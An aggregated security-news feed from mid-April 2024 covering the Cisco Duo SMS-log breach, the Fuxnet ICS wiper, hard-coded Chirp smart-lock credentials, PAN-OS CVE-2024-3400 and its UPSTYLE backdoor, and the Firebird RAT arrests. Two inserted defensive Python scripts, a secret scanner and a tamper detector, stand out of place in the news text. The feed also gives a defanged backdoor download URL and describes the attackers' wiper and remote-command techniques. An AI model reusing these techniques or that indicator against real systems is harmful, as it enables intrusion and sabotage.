15 April 2024: Security News

Cisco Duo warns telephony supplier data breach exposed MFA SMS logs

15 April 2024 at 20:36

Cisco Duo warns that a data breach involving one of its telephony suppliers exposed multifactor authentication (MFA) messages sent by the company via SMS and VOIP to its customers. 

Cisco Duo warns of a data breach involving one of its telephony suppliers, compromising multifactor authentication (MFA) messages sent to customers via SMS and VOIP.

The security breach occurred on April 1, 2024, when the threat actors used a Provider employee’s credentials that they had illicitly obtained through a phishing attack. They then used that access to download a set of MFA SMS message logs belonging to customers’ Duo accounts.

“More specifically, the threat actor downloaded message logs for SMS messages that were sent to certain users under your Duo account between March 1, 2024 and March 31, 2024. The message logs did not contain any message content but did contain the phone number, phone carrier, country, and state to which each message was sent, as well as other metadata (e.g., date and time of the message, type of message, etc.).” reads the data breach notification sent to the impacted individuals. “The Provider confirmed that the threat actor did not download or otherwise access the content of any messages or use their access to the Provider’s internal systems to send any messages to any of the numbers contained in the message logs.”

Threat actors had access to the phone numbers, phone carriers, countries, and states to which each message was sent. Attackers also obtained other metadata, including the date and time of each message and the type of message.

Once it discovered the incident, the Provider immediately launched an investigation and implemented mitigation measures. The Provider invalidated the employee’s credentials and analyzed the logs. The “Provider also started implementing measures to prevent similar incidents from occurring in the future and additional technical measures to further mitigate the risk associated with social engineering attacks. The Provider confirmed that they will also require employees to undergo additional social engineering awareness training.” continues the notification.

Affected users whose phone numbers were in the logs are recommended to remain vigilant and promptly report any suspected activities.

(SecurityAffairs – hacking, Cisco Duo)

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

Ukrainian Blackjack group used ICS malware Fuxnet against Russian targets

15 April 2024 at 19:39

The Ukrainian hacking group Blackjack used a destructive ICS malware dubbed Fuxnet in attacks against Russian infrastructure.

Industrial and enterprise IoT cybersecurity firm Claroty reported that the Ukrainian Blackjack hacking group claims to have damaged emergency detection and response capabilities in Moscow and beyond the Russian capital using a destructive ICS malware dubbed Fuxnet.

The Blackjack group is believed to be affiliated with Ukrainian intelligence services and has carried out other attacks against Russian targets, including an internet provider and military infrastructure.

The group claims to have attacked Moscollector, a Moscow-based company that is responsible for the construction and monitoring of underground water, sewage, and communications infrastructure.

The website ruexfil.com provided detailed information about the attacks against Moscollector; the hackers also published screenshots of monitoring systems, servers, and databases they claim to have compromised.


The site also hosts password dumps allegedly stolen from the Russian company.

Below is the timeline of the attack published on ruexfil.com:

- Initial access June 2023.
- Access to 112 Emergency Service.
- 87,000 sensors and controls have been disabled (including Airports, subways, gas-pipelines, ...).
- Fuxnet (stuxnet on steroids) was deployed earlier to slowly and physically destroy sensory equipment (by NAND/SSD exhaustion and introducing bad CRC into the firmware). (YouTube Video 1, YouTube Video 2).
- Fuxnet has now started to flood the RS485/MBus and is sending 'random' commands to 87,000 embedded control and sensory systems (carefully excluding hospitals, airports, ...and other civilian targets).
- All servers have been deleted. All routers have been reset to factory reset. Most workstations (including the admins workstations) have been deleted.
- Access to the office building has been disabled (all key-cards have been invalidated).
- Moscollector has recently been certified by the FSB for being 'secure & trusted' (picture included)
- Defaced the webpage (https://web.archive.org/web/20240409020908/https://moscollector.ru/)

The website reported that Blackjack destroyed about 1,700 sensor routers deployed at airports, subways, and gas pipelines. The group also disrupted the central command-dispatcher and database. The attack brought all 87,000 sensors offline; threat actors also wiped databases, backups, and email servers, a total of 30TB of data.

“Fuxnet has now started to flood the RS485/MBus and is sending ‘random’ commands to 87,000 embedded control and sensory systems (carefully excluding hospitals, airports, …and other civilian targets).” states the website.

Team82 and Claroty have been unable to verify the attackers’ claims; however, they conducted a detailed analysis of the Fuxnet malware relying on information provided by the attackers.

“For example, Blackjack claims to have damaged or destroyed 87,000 remote sensors and IoT collectors. However, our analysis of data leaked by Blackjack, including the Fuxnet malware, indicates that only a little more than 500 sensor gateways were bricked by the malware in the attack, and the remote sensors and controllers likely remain intact.” reads the analysis published by Claroty. “If the gateways were indeed damaged, the repairs could be extensive given that these devices are spread out geographically across Moscow and its suburbs, and must be either replaced or their firmware must be individually reflashed.”

The attack chain sees hackers targeting a list of sensor gateway IPs. Threat actors distributed their malware to each target, likely either through remote-access protocols such as SSH or the sensor protocol (SBK) over port 4321.

Upon running on the target device, the malware initiates a new child process to lock out the device. The malicious code remounts the filesystem with write access, then deletes essential filesystem files and directories and disables remote access services such as SSH, HTTP, telnet, and SNMP. This prevents remote access for restoring operations even if the router remains functional.

Subsequently, the threat actors erase the router’s routing table, rendering its communication with other devices non-functional. Finally, the malware deletes the filesystem and rewrites the flash memory using the operating system’s mtdblock devices.

Once it has corrupted the file system and isolated the device, the malware attempts to destroy the NAND memory chip physically and rewrites the UBI volume to prevent rebooting. 

“In order to ensure the sensor does not reboot again, the malware rewrites the UBI volume. First, the malware uses the IOCTL interface UBI_IOCVOLUP allowing it to interact with the management layer controlling the flash memory, which tells the kernel that the UBI volume will be rewritten, and that x-number of bytes will be written.” continues the report. “In its normal behavior, the kernel will know that the rewrite is finished only when x-number of bytes were written. However, the malware will not write x-number of bytes to the UBI, instead it will write fewer bytes than it declares, causing the device to wait for the rewrite to finish indefinitely.”  

The malware overwrites the UBI volume with junk data (0xFF), rendering the UBI useless and the filesystem unstable.

The malware also tries to disrupt gateway-connected sensors by flooding serial channels with random data, overloading the serial bus and the sensors.

“The attackers developed and deployed malware that targeted the gateways and deleted filesystems, directories, disabled remote access services, routing services for each device, and rewrote flash memory, destroyed NAND memory chips, UBI volumes and other actions that further disrupted operation of these gateways.” concludes the report.

(SecurityAffairs – hacking, Fuxnet)


Pierluigi Paganini

Intel and Lenovo BMCs Contain Unpatched Lighttpd Server Flaw

By: Newsroom
15 April 2024 at 16:51
A security flaw impacting the Lighttpd web server used in baseboard management controllers (BMCs) has remained unpatched by device vendors like Intel and Lenovo, new findings from Binarly reveal. While the original shortcoming was discovered and patched by the Lighttpd maintainers way back in August 2018 with version 1.4.51, the lack of a CVE identifier or an advisory meant that

Crickets from Chirp Systems in Smart Lock Key Leak

15 April 2024 at 14:51

The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

“Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access,” CISA’s alert warned, assigning the bug a CVSS (badness) rating of 9.1 (out of a possible 10). “Chirp Systems has not responded to requests to work with CISA to mitigate this vulnerability.”

Matt Brown, the researcher CISA credits with reporting the flaw, is a senior systems development engineer at Amazon Web Services. Brown said he discovered the weakness and reported it to Chirp in March 2021, after the company that manages his apartment building started using Chirp smart locks and told everyone to install Chirp’s app to get in and out of their apartments.

“I use Android, which has a pretty simple workflow for downloading and decompiling the APK apps,” Brown told KrebsOnSecurity. “Given that I am pretty picky about what I trust on my devices, I downloaded Chirp and after decompiling, found that they were storing passwords and private key strings in a file.”

Using those hard-coded credentials, Brown found an attacker could then connect to an application programming interface (API) that Chirp uses which is managed by smart lock vendor August.com, and use that to enumerate and remotely lock or unlock any door in any building that uses the technology.

Brown said when he complained to his leasing office, they sold him a small $50 key fob that uses Near-Field Communications (NFC) to toggle the lock when he brings the fob close to his front door. But he said the fob doesn’t eliminate the ability for anyone to remotely unlock his front door using the exposed credentials and the Chirp mobile app.

A smart lock enabled with Chirp. Image: Camdenliving.com

Also, the fobs pass the credentials to his front door over the air in plain text, meaning someone could clone the fob just by bumping against him with a smartphone app made to read and write NFC tags.
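The weakness Brown describes, credentials and private-key strings sitting in a file inside the shipped app, is the kind of thing a developer or app-security reviewer can catch before release by scanning the decompiled tree. The script below is an added example, not Brown's method and not code from Chirp or August: it walks a jadx-style decompiled directory (constructed here in a temporary folder with made-up file names and values) and flags PEM private-key blocks, password and API-key assignments, and long random-looking quoted literals by Shannon entropy. The rule set and the 4.0 bits/char threshold are assumptions chosen for illustration; production tools carry far more rules.

```python
import math
import os
import re
import tempfile
from collections import Counter

# Illustrative rule set (assumption): a real scanner ships many more patterns.
RULES = {
    "private-key-block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "password-assignment": re.compile(
        r"(?i)(?:password|passwd|pwd)\s*[=:]\s*[\"']([^\"']{6,})[\"']"),
    "generic-secret-assignment": re.compile(
        r"(?i)(?:api[_-]?key|secret|token)\s*[=:]\s*[\"']?([A-Za-z0-9+/=_\-]{16,})[\"']?"),
}
# Quoted tokens long and random-looking enough to be keys, signatures or tokens.
QUOTED_TOKEN = re.compile(r"[\"']([A-Za-z0-9+/=_\-]{24,})[\"']")
ENTROPY_THRESHOLD = 4.0  # bits per character; prose and identifiers sit well below this
TEXT_EXTENSIONS = {".java", ".kt", ".smali", ".xml", ".json", ".properties", ".txt", ".pem", ".js"}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (log2(len(set(s))) when all chars are distinct)."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(text: str, rel: str) -> list[tuple[str, str, int]]:
    """Return (relative path, rule name, line number) for every hit in one file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append((rel, name, lineno))
        for token in QUOTED_TOKEN.findall(line):
            if shannon_entropy(token) >= ENTROPY_THRESHOLD:
                findings.append((rel, "high-entropy-string", lineno))
    return findings


def scan_tree(root: str) -> list[tuple[str, str, int]]:
    """Walk a decompiled app tree and scan every text-like file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in TEXT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as f:
                findings.extend(scan_text(f.read(), rel))
    return findings


def build_sample_tree(root: str) -> None:
    """Constructed stand-in for a decompiled app; no real app's code or values."""
    samples = {
        "src/com/example/MainActivity.java":
            "package com.example;\npublic class MainActivity {\n"
            "    private static final String TAG = \"MainActivity\";\n"
            "    private static final String BASE_URL = \"https://example.invalid/v1\";\n}\n",
        "src/com/example/auth/Config.java":
            "package com.example.auth;\npublic final class Config {\n"
            "    // Constructed example of the anti-pattern: a shared credential baked into the app.\n"
            "    private static final String ADMIN_PASSWORD = \"hunter2-Sup3r\";\n}\n",
        "src/com/example/net/ApiClient.java":
            "package com.example.net;\npublic final class ApiClient {\n"
            "    // Constructed example: a random-looking signing key embedded as a literal.\n"
            "    private static final String SIGNING_KEY = \"Zt3qW8mN1xV6bK9yH2sL5pR0cJ4fA7gD\";\n}\n",
        "res/raw/client_key.pem":
            "-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedplaceholderkeymaterial\n"
            "-----END RSA PRIVATE KEY-----\n",
        "assets/api.properties":
            "base_url=https://example.invalid\napi_key=Qm7x9Kp2LwZ4nR8vT1cY5hJ3sA6fD0gE\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)


def run_demo() -> list[tuple[str, str, int]]:
    """Build the constructed tree, scan it, and return the sorted findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted(scan_tree(tmp))


if __name__ == "__main__":
    for rel, rule, lineno in run_demo():
        print(f"{rel}:{lineno}: {rule}")
```

Pointing `scan_tree` at a real decompiled directory (for example jadx output) is the only change needed to use it on an actual build; the entropy rule is what catches keys that no keyword regex names, at the cost of some noise from legitimate identifiers, so review its hits by hand.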

Neither August nor Chirp Systems responded to requests for comment. It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state that approximately 50,000 units use Chirp smart locks with August’s API.

Roughly a year before Brown reported the flaw to Chirp Systems, the company was bought by RealPage, a firm founded in 1998 as a developer of multifamily property management and data analytics software. In 2021, RealPage was acquired by the private equity giant Thoma Bravo.

Brown said the exposure he found in Chirp’s products is “an obvious flaw that is super easy to fix.”

“It’s just a matter of them being motivated to do it,” he said. “But they’re part of a private equity company now, so they’re not answerable to anybody. It’s too bad, because it’s not like residents of [the affected] properties have another choice. It’s either agree to use the app or move.”

In October 2022, an investigation by ProPublica examined RealPage’s dominance in the rent-setting software market and found that it “uses a mysterious algorithm to help landlords push the highest possible rents on tenants.”

“For tenants, the system upends the practice of negotiating with apartment building staff,” ProPublica found. “RealPage discourages bargaining with renters and has even recommended that landlords in some cases accept a lower occupancy rate in order to raise rents and make more money. One of the algorithm’s developers told ProPublica that leasing agents had ‘too much empathy’ compared to computer generated pricing.”

Last year, the U.S. Department of Justice threw its weight behind a massive lawsuit filed by dozens of tenants who are accusing the $9 billion apartment software company of helping landlords collude to inflate rents.

In February 2024, attorneys general for Arizona and the District of Columbia sued RealPage, alleging RealPage’s software helped create a rental monopoly.

CISA adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog

15 April 2024 at 13:31

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2024-3400 Palo Alto Networks PAN-OS Command Injection vulnerability to its Known Exploited Vulnerabilities (KEV) catalog:

CVE-2024-3400 (CVSS score of 10.0) is a critical command injection vulnerability in Palo Alto Networks PAN-OS software. An unauthenticated attacker can exploit the flaw to execute arbitrary code with root privileges on affected firewalls. This flaw impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.

Palo Alto Networks and Unit 42 are investigating the activity related to the CVE-2024-3400 PAN-OS flaw and discovered that threat actors have been exploiting it since March 26, 2024.

The researchers are tracking this cluster of activity, conducted by an unknown threat actor, under the name Operation MidnightEclipse.

“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor.” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”

Upon exploiting the flaw, the threat actor was observed creating a cronjob that would run every minute to access commands hosted on an external server that would execute via bash.

The researchers were unable to access the commands executed by the attackers; however, they believe threat actors attempted to deploy a second Python-based backdoor on the vulnerable devices.

Researchers at cybersecurity firm Volexity refer to this second Python backdoor as UPSTYLE.

The threat actor, tracked by Volexity as UTA0218, remotely exploited the firewall device to establish a reverse shell and install additional tools. Their primary objective was to extract configuration data from the devices and then use it as a foothold to expand laterally within the targeted organizations.

“During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. Details on this backdoor are included further on in this report.” reads the report published by Volexity. “As Volexity broadened its investigation, it discovered successful exploitation at multiple other customers and organizations dating back to March 26, 2024. Those attempts appear to be the threat actor testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability.”

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by April 19, 2024.


Pierluigi Paganini

(SecurityAffairs – Hacking, CISA)

AI Copilot: Launching Innovation Rockets, But Beware of the Darkness Ahead

15 April 2024 at 13:30
Imagine a world where the software that powers your favorite apps, secures your online transactions, and keeps your digital life could be outsmarted and taken over by a cleverly disguised piece of code. This isn't a plot from the latest cyber-thriller; it's actually been a reality for years now. How this will change – in a positive or negative direction – as artificial intelligence (AI) takes on

Muddled Libra Shifts Focus to SaaS and Cloud for Extortion and Data Theft Attacks

By: Newsroom
15 April 2024 at 13:29
The threat actor known as Muddled Libra has been observed actively targeting software-as-a-service (SaaS) applications and cloud service provider (CSP) environments in a bid to exfiltrate sensitive data. "Organizations often store a variety of data in SaaS applications and use services from CSPs," Palo Alto Networks Unit 42 said in a report published last week. "The threat

Threat actors exploited Palo Alto Pan-OS issue to deploy a Python Backdoor

15 April 2024 at 11:34

Threat actors have been exploiting the recently disclosed zero-day in Palo Alto Networks PAN-OS since March 26, 2024.

Palo Alto Networks and Unit 42 are investigating the activity related to the CVE-2024-3400 PAN-OS flaw and discovered that threat actors have been exploiting it since March 26, 2024.

CVE-2024-3400 (CVSS score of 10.0) is a critical command injection vulnerability in Palo Alto Networks PAN-OS software. An unauthenticated attacker can exploit the flaw to execute arbitrary code with root privileges on affected firewalls. This flaw impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.

The researchers are tracking this cluster of activity, conducted by an unknown threat actor, under the name Operation MidnightEclipse.

“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor.” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”

Upon exploiting the flaw, the threat actor was observed creating a cronjob that would run every minute to access commands hosted on an external server that would execute via bash.

The researchers were unable to access the commands executed by the attackers; however, they believe threat actors attempted to deploy a second Python-based backdoor on the vulnerable devices.

Researchers at cybersecurity firm Volexity refer to this second Python backdoor as UPSTYLE.

The UPSTYLE backdoor was hosted at hxxp://144.172.79[.]92/update.py, but Unit 42 observed a similar backdoor hosted at nhdata.s3-us-west-2.amazonaws[.]com. According to the HTTP headers, the threat actor last modified it on April 7, 2024.

The first Python payload creates and executes another Python script (“system.pth”), which then decrypts and launches the embedded backdoor component; that component executes the attacker’s commands, which it reads from a file named “sslvpn_ngx_error.log.”

After execution, the script records the command output in the file:

  • [snip]/css/bootstrap.min.css

A noteworthy aspect of the attack sequence is that both the file the commands are extracted from and the file the results are logged to are legitimate files that belong to the firewall:

  • /var/log/pan/sslvpn_ngx_error.log
  • /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css

“The script will then create another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file and sets the access and modified times to their originals.” continues the report. “The point of this function is to avoid leaving the output of the commands available for analysis. Also, this suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file.”
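The restore routine described above defeats two naive checks at once: a periodic hash of bootstrap.min.css sees the original bytes again after 15 seconds, and the access/modification times are put back with utime(). What utime() cannot put back on a POSIX system is the inode change time (ctime), which the kernel bumps on every write and on the utime() call itself. The script below is an added defensive example, not code from Unit 42, Volexity or the backdoor: it records a baseline for a static asset, reports content drift while the file is tampered, and still reports ctime drift once content and mtime have been restored. The file, its contents and the "command output" are constructed stand-ins in a temporary directory, and POSIX ctime semantics (Linux) are assumed.

```python
import hashlib
import os
import tempfile
import time
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Baseline:
    """Integrity record for one static web asset on the appliance."""
    sha256: str
    size: int
    mtime_ns: int
    ctime_ns: int


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(path: str) -> Baseline:
    """Take the baseline from a known-good state (e.g. right after a clean install)."""
    st = os.stat(path)
    return Baseline(sha256_of(path), st.st_size, st.st_mtime_ns, st.st_ctime_ns)


def check(path: str, base: Baseline) -> list[str]:
    """Compare the file against its baseline and return a list of finding tags."""
    findings = []
    st = os.stat(path)
    if st.st_size != base.size or sha256_of(path) != base.sha256:
        findings.append("content-mismatch")
    if st.st_mtime_ns != base.mtime_ns:
        findings.append("mtime-changed")
    # utime() can restore atime/mtime, but every write and every utime() call
    # updates ctime, and ctime cannot be set from userspace on POSIX systems.
    if st.st_ctime_ns != base.ctime_ns and st.st_mtime_ns == base.mtime_ns:
        findings.append("ctime-drift-with-restored-mtime")
    return findings


def simulate_overwrite_and_restore(path: str, payload: bytes,
                                   probe: Callable[[], list[str]]) -> list[str]:
    """Constructed stand-in for the write-then-restore behaviour the report describes.

    Overwrites the file, calls `probe` inside the tampered window, then writes the
    original bytes back and restores the original access/modification times.
    """
    with open(path, "rb") as f:
        original = f.read()
    st = os.stat(path)
    atime_ns, mtime_ns = st.st_atime_ns, st.st_mtime_ns
    with open(path, "wb") as f:
        f.write(payload)
    during = probe()
    with open(path, "wb") as f:
        f.write(original)
    os.utime(path, ns=(atime_ns, mtime_ns))
    return during


def run_demo() -> tuple[list[str], list[str]]:
    """Return (findings during the tampered window, findings after the restore)."""
    with tempfile.TemporaryDirectory() as tmp:
        css = os.path.join(tmp, "bootstrap.min.css")  # constructed stand-in asset
        with open(css, "wb") as f:
            f.write(b".navbar{display:flex}\n")
        base = snapshot(css)
        time.sleep(0.1)  # let the kernel's coarse file-time clock tick past the baseline
        during = simulate_overwrite_and_restore(
            css, b"constructed command output\n", lambda: check(css, base))
        after = check(css, base)
    return during, after


if __name__ == "__main__":
    during, after = run_demo()
    print("during tamper window:", during)
    print("after restore:       ", after)
```

On a real appliance the baseline would be taken from a clean firmware image and the check run from an out-of-band host against a mounted image or a stat() over the management channel, since a tool running on the compromised box can itself be tampered with; the ctime comparison is the part that survives the backdoor's own clean-up.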

The threat actor, tracked by Volexity as UTA0218, remotely exploited the firewall device to establish a reverse shell and install additional tools. Their primary objective was to extract configuration data from the devices and then use it as a foothold to expand laterally within the targeted organizations.

“During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. Details on this backdoor are included further on in this report.” reads the report published by Volexity. “As Volexity broadened its investigation, it discovered successful exploitation at multiple other customers and organizations dating back to March 26, 2024. Those attempts appear to be the threat actor testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability.”


“After successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they controlled in order to facilitate access to victims’ internal networks. They quickly moved laterally through victims’ networks, extracting sensitive credentials and other files that would enable access during and potentially after the intrusion.” concludes Volexity. “The tradecraft and speed employed by the attacker suggests a highly capable threat actor with a clear playbook of what to access to further their objectives.”

(SecurityAffairs – hacking, Palo Alto Pan-OS)


Pierluigi Paganini

Timing is Everything: The Role of Just-in-Time Privileged Access in Security Evolution

15 April 2024 at 10:21
To minimize the risk of privilege misuse, a trend in the privileged access management (PAM) solution market involves implementing just-in-time (JIT) privileged access. This approach to privileged identity management aims to mitigate the risks associated with prolonged high-level access by granting privileges temporarily and only when necessary, rather than providing users with

Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users

By: Newsroom
15 April 2024 at 09:04
Cybersecurity researchers have discovered a "renewed" cyber espionage campaign targeting users in South Asia with the aim of delivering an Apple iOS spyware implant called LightSpy. "The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular framework with extensive spying features," the BlackBerry Threat Research and Intelligence Team said in a report published last

Palo Alto Networks Releases Urgent Fixes for Exploited PAN-OS Vulnerability

By: Newsroom
15 April 2024 at 08:17
Palo Alto Networks has released hotfixes to address a maximum-severity security flaw impacting PAN-OS software that has come under active exploitation in the wild. Tracked as CVE-2024-3400 (CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root

U.S. and Australian police arrested Firebird RAT author and operator

15 April 2024 at 06:40

A joint investigation conducted by U.S. and Australian authorities led to the arrest of two key figures behind the Firebird RAT operation.

A joint law enforcement operation conducted by the Australian Federal Police (AFP) and the FBI resulted in the arrest and charging of two individuals suspected of creating and selling the Firebird RAT, which was later renamed Hive.

Australian Federal Police reported that an Australian man and a man based in the US will appear in court, following the international investigation that began in 2020. The Australian man faces twelve counts of computer offenses.

The Australian man developed and sold Firebird to customers on a dedicated hacking forum.

The RAT allowed customers to access and control their victims’ computers remotely; its author advertised its data-stealing capabilities.

Last week, the FBI arrested Edmond Chakhmakhchyan, 24, of Van Nuys, on charges of marketing and selling the RAT. Chakhmakhchyan, aka “Corruption,” was apprehended by FBI agents and pleaded not guilty to two charges. He is accused of advertising and selling the Hive remote access trojan (RAT) on the “Hack Forums” website. The man was accepting Bitcoin payments for licenses and offering customer service to buyers.

“Customers purchasing the malware “would transmit Hive RAT to protected computers and gain unauthorized control over and access to these computers, which allowed the RAT purchaser to close or disable programs, browse files, record keystrokes, access incoming and outgoing communications, and steal victim passwords and other credentials for bank accounts and cryptocurrency wallets, all without the victims’ knowledge or permission,” according to the indictment.” reported the DoJ. “Chakhmakhchyan allegedly began working with the creator of the Hive RAT, previously known as “Firebird,” approximately four years ago, and advertised online the RAT’s many features, including features that allowed the owner to remotely access victim computers and intercept communications and data without the victim knowing.”

According to the indictment, Chakhmakhchyan engaged in electronic communication with buyers after advertising the Hive RAT. He explained to one buyer that the malware allowed access to another person’s computer without their knowledge. When informed that the target had significant cryptocurrency and project files, Chakhmakhchyan agreed to sell the Hive RAT.

“After this purchaser told Chakhmakhchyan that “the point” of using the Hive RAT was because the victim had “20k in bitcoin on a blockchain wallet” and “project files worth over 5k,” Chakhmakhchyan agreed to sell the Hive RAT, the indictment alleges.” continues DoJ.

The DoJ states that the man allegedly sold a license to an undercover law enforcement agent. Chakhmakhchyan faces charges of conspiracy and advertising a device as an interception device, each carrying a maximum penalty of five years in federal prison.

Chakhmakhchyan could face up to ten years in prison, while the maximum penalty for the Australian man is three years imprisonment.

(SecurityAffairs – hacking, malware)


Pierluigi Paganini

Before yesterday: Security News

Canadian retail chain Giant Tiger data breach may have impacted millions of customers

14 April 2024 at 16:11

A threat actor claimed the hack of the Canadian retail chain Giant Tiger and leaked 2.8 million records on a hacker forum.

A threat actor, who goes online with the moniker ShopifyGUY, claimed responsibility for hacking the Canadian retail chain Giant Tiger and leaked 2.8 million records on a hacker forum.

Giant Tiger is a Canadian discount store chain that operates over 260 stores across Canada.

The threat actor behind the post claims to have uploaded the “full” database of Giant Tiger customer records stolen in March 2024. The compromised data include email addresses, names, phone numbers, physical addresses, and website activity. Financial data was not impacted in the alleged incident.

“In March 2024, the Canadian discount store chain Giant Tiger Stores Limited (https://www.gianttiger.com/) suffered a data breach that exposed over 2.8 million clients. The breach includes over 2.8 million unique email addresses, names, phone numbers and physical addresses. The data was breached by @ShopifyGUY” reads the announcement published by ShopifyGUY on Breachforums.


Every member of the forum can download the archive for 8 credits.

Customers of the Canadian retail chain can check for the presence of their data in the leaked archive by querying the data breach monitoring service HaveIBeenPwned.

New breach: Canadian retailer Giant Tiger had 2.8M records breached last month. Impacted data included email and physical address, name and phone. 46% were already in @haveibeenpwned. Read more: https://t.co/71a7YAVQvl

— Have I Been Pwned (@haveibeenpwned) April 12, 2024

BleepingComputer reached out to the retailer, which confirmed it had become aware of security concerns related to a third-party vendor.

(SecurityAffairs – hacking, Giant Tiger)


Pierluigi Paganini

Security Affairs newsletter Round 467 by Pierluigi Paganini – INTERNATIONAL EDITION

14 April 2024 at 10:55

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Crooks manipulate GitHub’s search results to distribute malware
BatBadBut flaw allowed an attacker to perform command injection on Windows
Roku disclosed a new security breach impacting 576,000 accounts
LastPass employee targeted via an audio deepfake call
TA547 targets German organizations with Rhadamanthys malware
CISA adds D-Link multiple NAS devices bugs to its Known Exploited Vulnerabilities catalog
US CISA published an alert on the Sisense data breach
Palo Alto Networks fixed multiple DoS bugs in its firewalls
Apple warns of mercenary spyware attacks on iPhone users in 92 countries
Microsoft fixed two zero-day bugs exploited in malware attacks
Group Health Cooperative data breach impacted 530,000 individuals
AT&T states that the data breach impacted 51 million former and current customers
Fortinet fixed a critical remote code execution bug in FortiClientLinux
Microsoft Patches Tuesday security updates for April 2024 fixed hundreds of issues
Over 91,000 LG smart TVs running webOS are vulnerable to hacking
Crowdfense is offering a larger 30M USD exploit acquisition program
Over 92,000 Internet-facing D-Link NAS devices can be easily hacked

Cybercrime    

Social Engineering Attacks Targeting IT Help Desks in the Health Sector

DOJ data on 341,000 people leaked in cyberattack on consulting firm

Hackers deploy crypto drainers on thousands of WordPress sites

530k Impacted by Data Breach at Wisconsin Healthcare Organization  

TA547 Targets German Organizations with Rhadamanthys Stealer

Attempted Audio Deepfake Call Targets LastPass Employee  

Malware

Shifting the Lens: Detecting Malware in npm ecosystem with Large Language Models

ScrubCrypt Deploys VenomRAT with an Arsenal of Plugins  

Smoke and (screen) mirrors: A strange signed backdoor  

New Technique to Trick Developers Detected in an Open Source Supply Chain Attack

Active Nitrogen campaign delivered via malicious ads for PuTTY, FileZilla       

Hacking 

Crowdfense Exploit Acquisition Program

Vulnerabilities Identified in LG WebOS  

Roku warns 576,000 accounts hacked in new credential stuffing attacks

BatBadBut: You can’t securely execute commands on Windows 

XZ backdoor story – Initial analysis

PSG: the club’s ticketing system attacked     

Intelligence and Information Warfare 

China tests US voter fault lines and ramps AI content to boost its geopolitical interests

Apple drops term ‘state-sponsored’ attacks from its threat notification policy     

Why we must take seriously China’s mastery and misuse of AI espionage

Messages between Chinese hackers show Australian Strategic Policy Institute is a target       

Top Israeli spy chief exposes his true identity in online security lapse   

Cybersecurity          

The April 2024 security updates review 

